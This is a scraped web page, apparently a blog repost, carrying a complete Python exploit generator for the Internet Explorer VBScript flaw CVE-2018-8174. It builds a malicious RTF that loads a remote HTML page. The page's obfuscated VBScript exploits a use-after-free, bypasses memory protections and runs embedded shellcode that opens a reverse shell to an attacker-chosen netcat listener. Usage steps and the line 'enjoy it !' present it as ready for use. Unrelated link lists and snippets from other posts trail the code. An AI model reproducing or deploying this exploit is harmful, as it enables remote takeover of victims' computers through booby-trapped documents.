CVE-2018-8174 EXP 0day python
usage: CVE-2018-8174.py [-h] -u URL -o OUTPUT [-i IP] [-p PORT]
Exploit for CVE-2018-8174
optional arguments: -h, --help show this help message and exit -u URL, --url URL exp url -o OUTPUT, --output OUTPUT Output exploit rtf -i IP, --ip IP ip for netcat -p PORT, --port PORT port for netcat
eg:
- python CVE-2018-8174.py -u http://1.1.1.1/exploit.html -o exp.rtf -i 2.2.2.2 -p 4444
- put exploit.html on your server (1.1.1.1)
- netcat listen on [any] 4444 (2.2.2.2)
enjoy it !
POC:
import argparse
import struct SampleRTF = R"""{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\sa200\sl276\slmult1\lang9\f0\fs22{\object\objautlink\objupdate\rsltpict\objw4321\objh4321{\*\objclass htmlfile}{\*\objdata 0105000002000000090000004f4c45324c696e6b000000000000000000000a0000
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000903b
beae04f2d30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
000000000000000000000000f20000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
000000000000000000000000050000008100000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f31353838343937393534000000000080000000e0c9ea79f9bace118c8200aa004ba90b68000000
UNICODE_URL
000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff20693325f903cf118fd000aa00686f1300000000ffffffff0000
000000000000e05dd6ab04f2d30100000000000000000000000000000000000000000000100203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002700
NORMAL_URL
0000bbbbcccc2700
UNICODE_URL
0000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c45504943540000000000000000005e0000000800000000000000
0100090000032b00000000000500000000000400000003010800050000000b0200000000050000000c0200000000030000001e00050000000d0200000000050000000d0200000000040000002701ffff030000000000}
}\par
}
""" SampleHTML = R"""
<!doctype html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="x-ua-compatible" content="IE=10">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-control" content="no-cache">
<meta http-equiv="Cache" content="no-cache">
</head>
<body>
<script language="vbscript">
Dim lIIl
Dim IIIlI(6),IllII(6)
Dim IllI
Dim IIllI(40)
Dim lIlIIl,lIIIll
Dim IlII
Dim llll,IIIIl
Dim llllIl,IlIIII
Dim NtContinueAddr,VirtualProtectAddr
IlII=195948557
lIlIIl=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
lIIIll=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
IllI=195890093
Function IIIII(Domain)
lIlII=0
IllllI=0
IIlIIl=0
Id=CLng(Rnd*1000000)
lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
lIlII=lIlII-(&h86d+6447-&H219b)
End If
IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
IIIII=Domain &"?" &Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII
End Function
Function lIIII(ByVal lIlIl)
IIll=""
For index=0 To Len(lIlIl)-1
IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
Next
IIll=IIll &"00"
If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
IIll=IIll &"00"
End If
For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
lIIII=lIIII &"%u" &lIlIll &lIIIlI
Next
End Function
Function lIlI(ByVal Number,ByVal Length)
IIII=Hex(Number)
If Len(IIII)<Length Then
IIII=String(Length-Len(IIII),"0") &IIII 'pad allign with zeros
Else
IIII=Right(IIII,Length)
End If
lIlI=IIII
End Function
Function GetUint32(lIII)
Dim value
llll.mem(IlII+8)=lIII+4
llll.mem(IlII)=8 'type string
value=llll.P0123456789
llll.mem(IlII)=2
GetUint32=value
End Function
Function IllIIl(lIII)
IllIIl=GetUint32(lIII) And (131071-65536)
End Function
Function lllII(lIII)
lllII=GetUint32(lIII) And (&h17eb+1312-&H1c0c)
End Function
Sub llllll
End Sub
Function GetMemValue
llll.mem(IlII)=(&h713+3616-&H1530)
GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))
End Function
Sub SetMemValue(ByRef IlIIIl)
llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl
End Sub
Function LeakVBAddr
On Error Resume Next
Dim lllll
lllll=llllll
lllll=null
SetMemValue lllll
LeakVBAddr=GetMemValue()
End Function
Function GetBaseByDOSmodeSearch(IllIll)
Dim llIl
llIl=IllIll And &hffff0000
Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692
llIl=llIl-65536
Loop
GetBaseByDOSmodeSearch=llIl
End Function
Function StrCompWrapper(lIII,llIlIl)
Dim lIIlI,IIIl
lIIlI=""
For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
Next
StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
End Function
Function GetBaseFromImport(base_address,name_input)
Dim import_rva,nt_header,descriptor,import_dir
Dim IIIIII
nt_header=GetUint32(base_address+(&h3c))
import_rva=GetUint32(base_address+nt_header+&h80)
import_dir=base_address+import_rva
descriptor=0
Do While True
Dim Name
Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
If Name=0 Then
GetBaseFromImport=&hBAAD0000
Exit Function
Else
If StrCompWrapper(base_address+Name,name_input)=0 Then
Exit Do
End If
End If
descriptor=descriptor+1
Loop
IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
End Function
Function GetProcAddr(dll_base,name)
Dim p,export_dir,index
Dim function_rvas,function_names,function_ordin
Dim Illlll
p=GetUint32(dll_base+&h3c)
p=GetUint32(dll_base+p+&h78)
export_dir=dll_base+p
function_rvas=dll_base+GetUint32(export_dir+&h1c)
function_names=dll_base+GetUint32(export_dir+&h20)
function_ordin=dll_base+GetUint32(export_dir+&h24)
index=0
Do While True
Dim lllI
lllI=GetUint32(function_names+index*4)
If StrCompWrapper(dll_base+lllI,name)=0 Then
Exit Do
End If
index=index+1
Loop
Illlll=IllIIl(function_ordin+index*2)
p=GetUint32(function_rvas+Illlll*4)
GetProcAddr=dll_base+p
End Function
Function GetShellcode()
IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("REPLACE_SHELLCODE_HERE" &lIIII(IIIII("")))
IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
GetShellcode=IIlI
End Function
Function EscapeAddress(ByVal value)
Dim High,Low
High=lIlI((value And &hffff0000)/&h10000,4)
Low=lIlI(value And &hffff,4)
EscapeAddress=Unescape("%u" &Low &"%u" &High)
End Function
Function lIllIl
Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
IlllI=lIlI(NtContinueAddr,8)
IlIII=Mid(IlllI,1,2)
llllI=Mid(IlllI,3,2)
llIII=Mid(IlllI,5,2)
lIllI=Mid(IlllI,7,2)
IIlI=""
IIlI=IIlI &"%u0000%u" &lIllI &"00"
For IIIl=1 To 3
IIlI=IIlI &"%u" &llllI &llIII
IIlI=IIlI &"%u" &lIllI &IlIII
Next
IIlI=IIlI &"%u" &llllI &llIII
IIlI=IIlI &"%u00" &IlIII
lIllIl=Unescape(IIlI)
End Function
Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg
Dim IIlI
IIlI=String((100334-65536),Unescape("%u4141"))
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
IIlI=IIlI &EscapeAddress(&h3000)
IIlI=IIlI &EscapeAddress(&h40)
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
IIlI=IIlI &String(6,Unescape("%u4242"))
IIlI=IIlI &lIllIl()
IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
WrapShellcodeWithNtContinueContext=IIlI
End Function
Function ExpandWithVirtualProtect(lIlll)
Dim IIlI
Dim lllllI
lllllI=lIlll+&h23
IIlI=""
IIlI=IIlI &EscapeAddress(lllllI)
IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141"))
IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
IIlI=IIlI &EscapeAddress(&h1b)
IIlI=IIlI &EscapeAddress(0)
IIlI=IIlI &EscapeAddress(lIlll)
IIlI=IIlI &EscapeAddress(&h23)
IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343"))
ExpandWithVirtualProtect=IIlI
End Function
Sub ExecuteShellcode
llll.mem(IlII)=&h4d 'DEP bypass
llll.mem(IlII+8)=0
msgbox(IlII) 'VT replaced
End Sub
Class cla1
Private Sub Class_Terminate()
Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))
IllI=IllI+(&h14b5+2725-&H1f59)
lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
End Sub
End Class
Class cla2
Private Sub Class_Terminate()
Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))
IllI=IllI+(&h880+542-&Ha9d)
lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
End Sub
End Class
Class IIIlIl
End Class
Class llIIl
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class
Class IIIlll
Dim mem
Function P0123456789
P0123456789=LenB(mem(IlII+8))
End Function
Function SPP
End Function
End Class
Class lllIIl
Public Default Property Get P
Dim llII
P=174088534690791e-324
For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
IIIlI(IIIl)=(&h2176+711-&H243d)
Next
Set llII=New IIIlll
llII.mem=lIlIIl
For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
Set IIIlI(IIIl)=llII
Next
End Property
End Class
Class llllII
Public Default Property Get P
Dim llII
P=636598737289582e-328
For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
IllII(IIIl)=(&h442+2598-&He68)
Next
Set llII=New IIIlll
llII.mem=lIIIll
For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
Set IllII(IIIl)=llII
Next
End Property
End Class
Set llllIl=New lllIIl
Set IlIIII=New llllII
Sub UAF
For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
Set IIllI(IIIl)=New IIIlIl
Next
For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
Set IIllI(IIIl)=New llIIl
Next
IllI=0
For IIIl=0 To 6
ReDim lIIl(1)
Set lIIl(1)=New cla1
Erase lIIl
Next
Set llll=New llIIl
IllI=0
For IIIl=0 To 6
ReDim lIIl(1)
Set lIIl(1)=New cla2
Erase lIIl
Next
Set IIIIl=New llIIl
End Sub
Sub InitObjects
llll.SetProp(llllIl)
IIIIl.SetProp(IlIIII)
IlII=IIIIl.mem
End Sub
Sub StartExploit
UAF
InitObjects
vb_adrr=LeakVBAddr()
// Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(GetUint32(vb_adrr))
vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
// Alert "VBScript Base: 0x" & Hex(vbs_base)
msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
// Alert "MSVCRT Base: 0x" & Hex(msv_base)
krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
// Alert "KernelBase Base: 0x" & Hex(krb_base)
ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
// Alert "Ntdll Base: 0x" & Hex(ntd_base)
VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
// Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr)
NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
// Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr)
SetMemValue GetShellcode()
ShellcodeAddr=GetMemValue()+8
// Alert "Shellcode Address 0x" & Hex(ShellcodeAddr)
SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
lIlll=GetMemValue()+69596
SetMemValue ExpandWithVirtualProtect(lIlll)
llIIll=GetMemValue()
// Alert "Executing Shellcode"
ExecuteShellcode
End Sub
StartExploit
</script>
</body>
</html>
""" reverseip = '1.1.1.1'
reverseport = 4444 def create_rtf_file(url,filename):
NORMAL_URL = url.encode('hex')+""*(78-len(url.encode('hex')))
UNICODE_URL = "".join("{:02x}".format(ord(c)) for c in url)
if len(UNICODE_URL) < 154:
print 'UNICODE_URL len %d , need to pad ...' % len(UNICODE_URL)
UNICODE_URL = UNICODE_URL+""*(154 - len(UNICODE_URL))
res = SampleRTF.replace('NORMAL_URL',NORMAL_URL).replace('UNICODE_URL',UNICODE_URL)
f = open(filename, 'w')
f.write(res)
f.close()
print "Generated "+filename+" successfully" def rev_shellcode(ip,port):
ip = [int(i) for i in ip.split(".")]
buf = ""
buf += "\xfc\xe9\x8a\x00\x00\x00\x5d\x83\xc5\x0b\x81\xc4\x70"
buf += "\xfe\xff\xff\x8d\x54\x24\x60\x52\x68\xb1\x4a\x6b\xb1"
buf += "\xff\xd5\x8d\x44\x24\x60\xeb\x5c\x5e\x8d\x78\x60\x57"
buf += "\x50\x31\xdb\x53\x53\x68\x04\x00\x00\x08\x53\x53\x53"
buf += "\x56\x53\x68\x79\xcc\x3f\x86\xff\xd5\x85\xc0\x74\x59"
buf += "\x6a\x40\x80\xc7\x10\x53\x53\x31\xdb\x53\xff\x37\x68"
buf += "\xae\x87\x92\x3f\xff\xd5\x54\x68\x44\x01\x00\x00\xeb"
buf += "\x39\x50\xff\x37\x68\xc5\xd8\xbd\xe7\xff\xd5\x53\x53"
buf += "\x53\x8b\x4c\x24\xfc\x51\x53\x53\xff\x37\x68\xc6\xac"
buf += "\x9a\x79\xff\xd5\xe9\x41\x01\x00\x00\xe8\x9f\xff\xff"
buf += "\xff\x72\x75\x6e\x64\x6c\x6c\x33\x32\x2e\x65\x78\x65"
buf += "\x00\xe8\x71\xff\xff\xff\xe8\xc2\xff\xff\xff\xfc\xe8"
buf += "\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
buf += "\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01"
buf += "\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c"
buf += "\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b"
buf += "\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac"
buf += "\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b"
buf += "\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c"
buf += "\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44"
buf += "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
buf += "\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73"
buf += "\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
buf += "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5"
buf += "\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0"
buf += "\xff\xd5\x97\x6a\x05\x68"+struct.pack("!4B",ip[0],ip[1],ip[2],ip[3])+"\x68\x02\x00"
buf += struct.pack("!H",port)+"\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
buf += "\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
buf += "\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57"
buf += "\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44"
buf += "\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50"
buf += "\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc"
buf += "\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08"
buf += "\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95"
buf += "\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05"
buf += "\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" return buf.encode("hex") def gen_shellcode(s):
n = len(s)
i = 0
strs = ''
if n % 4 == 2:
s=s+''
while i <n:
strs += '%u'+s[i+2:i+4]+s[i:i+2]
i+=4
return strs if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Exploit for CVE-2018-8174")
parser.add_argument("-u", "--url", help="exp url", required=True)
parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
parser.add_argument('-i', "--ip", help="ip for netcat", required=False)
parser.add_argument('-p', "--port", help="port for netcat", required=False)
args = parser.parse_args()
url = args.url
filename = args.output
create_rtf_file(url,filename)
if args.ip and args.port:
ip = str(args.ip)
port = int(args.port)
shellcode = gen_shellcode(rev_shellcode(ip,port))
else:
shellcode = gen_shellcode(rev_shellcode(reverseip,reverseport))
res = SampleHTML.replace('REPLACE_SHELLCODE_HERE',shellcode)
f = open('exploit.html', 'w')
f.write(res)
f.close() print "!!! Completed !!!"
CVE-2018-8174 EXP 0day python的更多相关文章
- 2018年3月python传智播客人工智能基础就业班全套视频教程
2018年3月python传智播客人工智能基础就业班全套视频教程 有需要的可以留言留下邮箱.
- 2018年为什么要学习Python?Python还有前景吗?
近年来,Python一直是当仁不让的开发入行首选,无论是职位数量.就业广度还是使用排行都远超其他语言,而且Python语言接近自然语言,学习起来非常的轻松简便,因此也越来越受到人们的欢迎.进入到201 ...
- 2018传智黑马Python人工智能视频教程(基础+就业+面试)
2018传智黑马Python人工智能视频教程(基础+就业+面试) 2018传智黑马Python人工智能视频教程(基础+就业+面试) 2018传智黑马Python人工智能视频教程(基础+就业+面试) 下 ...
- 2018 开始认真学习点python
2018 伊始,又是春暖花开.俗语,“一年之计在于春”.又是一年立志时. 决定认真学习一些web. 本来倾向与学习NodeJS的.可是之前买的python的书太多了.就先紧手头的资源看了再说吧. 今天 ...
- 零基础2018如何系统地学习python?
首先告诉你的是,零基础学习开始系统学习Python肯定难,Python的专业程度本身就不简单,学习这事本来就是一件非常煎熬的事情,人都不愿意学习,可是没办法,为了生存掌握一个技能,你必须学,如果你认真 ...
- python每日学习2018/1/14(python之禅)
The Zen of Python, by Tim Peters Beautiful is better than ugly. Explicit is better than implicit. ...
- 深入剖析最新IE0day漏洞
在2018年4月下旬,我们使用沙箱发现了IE0day漏洞;自从在野外发现上一个样本(CVE-2016-0189)已经有两年多了.从许多方面来看,这个特别的漏洞及其后续的开发比较有趣.下一篇文章将分析最 ...
- 第二波分析:德国是2018世界杯夺冠最大热门? Python数据分析来揭开神秘面纱… (附源代码)
2018年,世界杯小组赛已经在如火如荼的进行中.在上篇文章的基础上[2018世界杯:用Python分析热门夺冠球队],我们继续分析世界杯32强的实力情况,以期能够更进一步分析本次世界杯的夺冠热门球队. ...
- 2018 Python开发者大调查:Python和JavaScript最配?
在2018年秋季,Python软件基金会与JetBrains发起了年度Python开发者调查. 报告的目的是寻找Python领域的新趋势,帮助开发者深入了解2018年Python开发者的现状. 该报告 ...
随机推荐
- Try-Catch真的会影响程序性能吗
很多帖子都分析过Try-Catch的机制,以及其对性能的影响. 但是并没有证据证明,Try-Catch过于损耗了系统的性能,尤其是在托管环境下.记得园子里有位网友使用StopWatch分析过Try-C ...
- 浏览器跨域访问WebApi
webapi地址:wapapi.ebcbuy.com web地址:wapweb.ebcbuy.com 在默认情况下这两个域名属于两个不同的域,他们之间的交互存在跨域的问题,但因为他们都同属于一 ...
- 乘风破浪:LeetCode真题_020_Valid Parentheses
乘风破浪:LeetCode真题_020_Valid Parentheses 一.前言 下面开始堆栈方面的问题了,堆栈的操作基本上有压栈,出栈,判断栈空等等,虽然很简单,但是非常有意义. 二.Valid ...
- php测试工具
如果是测压力有apache的ab如果要看性能则有xdebug和xhprof.还有linux的strace命令来跟踪程序的执行时的系统调用
- Python 处理脚本的命令行参数-getopt
# -*- coding:utf-8 -*- import sys def test(): """ 参数列表:sys.argv 参数个数:len(sys.argv) 脚本 ...
- Join的加强版CountDownLatch
CountDownLatch允许一个或多个线程等待其他线程完成操作. 假如有这样一个需求:我们需要解析一个Excel里多个sheet的数据,此时可以考虑使用多线程,每个线程解析一个sheet里的数据, ...
- python接口测试-项目实践(八) 完成的接口类和执行脚本
脱敏后脚本 projectapi.py: 项目接口类 # -*- coding:utf-8 -*- """ xx项目接口类 2018-11 dinghanhua &quo ...
- bzoj5153 [Wc2018]州区划分
题目链接 正解:子集和变换. 考场上只会暴力和$p=0$的情况,还只会$O(2^{n}*n^{3})$的. 然而这题题面出锅,导致考场上一直在卡裸暴力,后面的部分分没写了..听$laofu$说$O(2 ...
- Guava包学习-Cache
这段时间用到了ehcache和memcache,memcache只用来配置在tomcat中做负载均衡过程中的session共享,然后ehcache用来存放需要的程序中缓存. Guava中的Cache和 ...
- sprintf格式化字符串安全问题
先看sprintf用法: 定义和用法 sprintf() 函数把格式化的字符串写入变量中. arg1.arg2.++ 参数将被插入到主字符串中的百分号(%)符号处.该函数是逐步执行的.在第一个 % 符 ...